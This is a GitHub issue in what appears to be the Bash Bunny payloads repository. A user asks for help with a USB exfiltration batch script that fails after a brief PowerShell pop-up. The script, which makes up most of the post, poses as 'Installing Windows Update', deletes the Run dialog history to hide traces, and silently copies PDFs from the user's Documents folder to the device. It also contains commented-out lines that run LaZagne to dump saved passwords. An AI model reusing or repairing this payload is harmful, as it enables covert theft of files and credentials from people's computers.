hak5/bashbunny-payloads

Problem with the usb_exfiltrator.

mosesraona opened this issue · 0 comments

Hi everyone, first post ever here.

I recently got a Bash Bunny to test some things out on my PC.
I just can't get it to work.

The perfect scenario would be that, after plugging the Bash Bunny in, it copies all the .pdf files from all drives.

This is what I have atm:
```batch
@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
REM setlocal
REM cd /d %dp0
REM %dp0\laZagne.exe all > "%dp0....\loot\USB_Exfiltration%COMPUTERNAME%_%date:-4,4%%date:-10,2%%date:7,2%_%time:-11,2%%time:-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%dp0....\loot\USB_Exfiltration%COMPUTERNAME%_%date:-4,4%%date:-10,2%%date:7,2%_%time:-11,2%%time:-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents*.pdf %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@EXIT
```

This should take all the files from the personal Documents folder, but after a quick PowerShell pop-up nothing happens.

Thx in advance for the help.